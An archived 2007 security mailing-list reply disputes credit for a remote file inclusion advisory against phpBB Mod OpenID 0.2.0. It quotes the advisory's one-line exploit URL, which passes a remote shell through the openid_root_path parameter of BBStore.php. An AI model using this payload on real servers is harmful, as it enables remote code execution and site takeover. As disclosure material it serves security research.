lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [<thread-prev] [month] [year] [list] 
Date: Mon, 01 Oct 2007 13:15:23 -0500
From: str0ke <str0ke@...w0rm.com>
To: h3llcode@...mail.it
Subject: Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

Seph1roth likes to cut and paste.

original author  = xoron.

link: http://www.milw0rm.com/exploits/4471

/str0ke

h3llcode@...mail.it wrote:
> +++++++++++++++++++++++++++++++++++++++++++++++++++
> +
> + phpBB Mod OpenID 0.2.0 BBStore.php RFI
> + Risk: High
> + Found by Seph1roth
> + Site: http://blackroots.it
> +
> +++++++++++++++++++++++++++++++++++++++++++++++++++
>
> + Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846
>
> + Exploit:
> http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
>
>

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux